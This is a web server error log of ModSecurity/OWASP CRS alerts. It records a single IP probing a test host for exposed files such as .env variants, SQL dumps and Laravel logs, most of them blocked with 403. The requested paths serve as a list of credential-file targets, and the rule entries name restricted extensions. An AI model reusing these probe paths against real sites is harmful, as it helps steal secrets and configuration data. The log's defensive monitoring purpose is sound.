[Wed Jan 14 17:34:53.764954 2026] [:error] [pid 1413460] [client 34.220.197.24:39136] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWfFrQByDtVd7SkMa28kYgAAAAQ"]
[Wed Jan 14 17:34:53.765269 2026] [:error] [pid 1413460] [client 34.220.197.24:39136] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWfFrQByDtVd7SkMa28kYgAAAAQ"]
[Wed Jan 14 17:34:53.765439 2026] [:error] [pid 1413460] [client 34.220.197.24:39136] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWfFrQByDtVd7SkMa28kYgAAAAQ"]
[Wed Jan 14 17:34:54.486863 2026] [:error] [pid 1413457] [client 34.220.197.24:39300] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWfFrtedw_XRw0xH6MrJTAAAAAE"]
[Wed Jan 14 17:34:54.487197 2026] [:error] [pid 1413457] [client 34.220.197.24:39300] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWfFrtedw_XRw0xH6MrJTAAAAAE"]
[Wed Jan 14 17:34:54.487369 2026] [:error] [pid 1413457] [client 34.220.197.24:39300] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWfFrtedw_XRw0xH6MrJTAAAAAE"]
[Wed Jan 14 17:34:58.121206 2026] [:error] [pid 1413459] [client 34.220.197.24:40080] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWfFskmBk0CuCHAyPqetHgAAAAM"]
[Wed Jan 14 17:34:58.121585 2026] [:error] [pid 1413459] [client 34.220.197.24:40080] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWfFskmBk0CuCHAyPqetHgAAAAM"]
[Wed Jan 14 17:34:58.121784 2026] [:error] [pid 1413459] [client 34.220.197.24:40080] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWfFskmBk0CuCHAyPqetHgAAAAM"]
[Wed Jan 14 17:34:59.564763 2026] [:error] [pid 1413460] [client 34.220.197.24:40422] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWfFswByDtVd7SkMa28kYwAAAAQ"]
[Wed Jan 14 17:34:59.564973 2026] [:error] [pid 1413460] [client 34.220.197.24:40422] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWfFswByDtVd7SkMa28kYwAAAAQ"]
[Wed Jan 14 17:34:59.565157 2026] [:error] [pid 1413460] [client 34.220.197.24:40422] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWfFswByDtVd7SkMa28kYwAAAAQ"]
[Wed Jan 14 17:35:00.284609 2026] [:error] [pid 1413457] [client 34.220.197.24:40590] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWfFtNedw_XRw0xH6MrJTQAAAAE"]
[Wed Jan 14 17:35:00.285564 2026] [:error] [pid 1413457] [client 34.220.197.24:40590] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWfFtNedw_XRw0xH6MrJTQAAAAE"]
[Wed Jan 14 17:35:00.285781 2026] [:error] [pid 1413457] [client 34.220.197.24:40590] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWfFtNedw_XRw0xH6MrJTQAAAAE"]
[Wed Jan 14 17:35:01.009293 2026] [:error] [pid 1413456] [client 34.220.197.24:40760] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWfFtcFbvLGMHoHvQxNzLAAAAAA"]
[Wed Jan 14 17:35:01.009500 2026] [:error] [pid 1413456] [client 34.220.197.24:40760] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWfFtcFbvLGMHoHvQxNzLAAAAAA"]
[Wed Jan 14 17:35:01.009671 2026] [:error] [pid 1413456] [client 34.220.197.24:40760] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWfFtcFbvLGMHoHvQxNzLAAAAAA"]
[Wed Jan 14 17:35:03.933858 2026] [:error] [pid 1413459] [client 34.220.197.24:41418] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWfFt0mBk0CuCHAyPqetHwAAAAM"]
[Wed Jan 14 17:35:03.934082 2026] [:error] [pid 1413459] [client 34.220.197.24:41418] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWfFt0mBk0CuCHAyPqetHwAAAAM"]
[Wed Jan 14 17:35:03.934265 2026] [:error] [pid 1413459] [client 34.220.197.24:41418] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWfFt0mBk0CuCHAyPqetHwAAAAM"]
[Wed Jan 14 17:35:05.387379 2026] [:error] [pid 1413460] [client 34.220.197.24:41748] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWfFuQByDtVd7SkMa28kZAAAAAQ"]
[Wed Jan 14 17:35:05.387590 2026] [:error] [pid 1413460] [client 34.220.197.24:41748] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWfFuQByDtVd7SkMa28kZAAAAAQ"]
[Wed Jan 14 17:35:05.387774 2026] [:error] [pid 1413460] [client 34.220.197.24:41748] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWfFuQByDtVd7SkMa28kZAAAAAQ"]
[Wed Jan 14 17:35:06.101706 2026] [:error] [pid 1413457] [client 34.220.197.24:41914] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWfFutedw_XRw0xH6MrJTgAAAAE"]
[Wed Jan 14 17:35:06.101914 2026] [:error] [pid 1413457] [client 34.220.197.24:41914] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWfFutedw_XRw0xH6MrJTgAAAAE"]
[Wed Jan 14 17:35:06.102090 2026] [:error] [pid 1413457] [client 34.220.197.24:41914] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWfFutedw_XRw0xH6MrJTgAAAAE"]
[Wed Jan 14 17:35:06.819093 2026] [:error] [pid 1413456] [client 34.220.197.24:42096] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWfFusFbvLGMHoHvQxNzLQAAAAA"]
[Wed Jan 14 17:35:06.819310 2026] [:error] [pid 1413456] [client 34.220.197.24:42096] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWfFusFbvLGMHoHvQxNzLQAAAAA"]
[Wed Jan 14 17:35:06.819834 2026] [:error] [pid 1413456] [client 34.220.197.24:42096] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWfFusFbvLGMHoHvQxNzLQAAAAA"]
[Wed Jan 14 17:35:07.542395 2026] [:error] [pid 1413485] [client 34.220.197.24:42250] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWfFu7z8c3lrfqFQknOrcAAAAAc"]
[Wed Jan 14 17:35:07.542605 2026] [:error] [pid 1413485] [client 34.220.197.24:42250] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWfFu7z8c3lrfqFQknOrcAAAAAc"]
[Wed Jan 14 17:35:07.542766 2026] [:error] [pid 1413485] [client 34.220.197.24:42250] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWfFu7z8c3lrfqFQknOrcAAAAAc"]
[Wed Jan 14 17:35:08.979131 2026] [:error] [pid 1413484] [client 34.220.197.24:42584] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWfFvPcsqy-MSlD5wL45FwAAAAY"]
[Wed Jan 14 17:35:08.979346 2026] [:error] [pid 1413484] [client 34.220.197.24:42584] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWfFvPcsqy-MSlD5wL45FwAAAAY"]
[Wed Jan 14 17:35:08.979520 2026] [:error] [pid 1413484] [client 34.220.197.24:42584] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWfFvPcsqy-MSlD5wL45FwAAAAY"]
[Wed Jan 14 17:35:09.701045 2026] [authz_core:error] [pid 1413459] [client 34.220.197.24:42762] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Wed Jan 14 17:35:10.420149 2026] [:error] [pid 1413458] [client 34.220.197.24:42918] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWfFvsPNANEsYGk5QcxtFAAAAAI"]
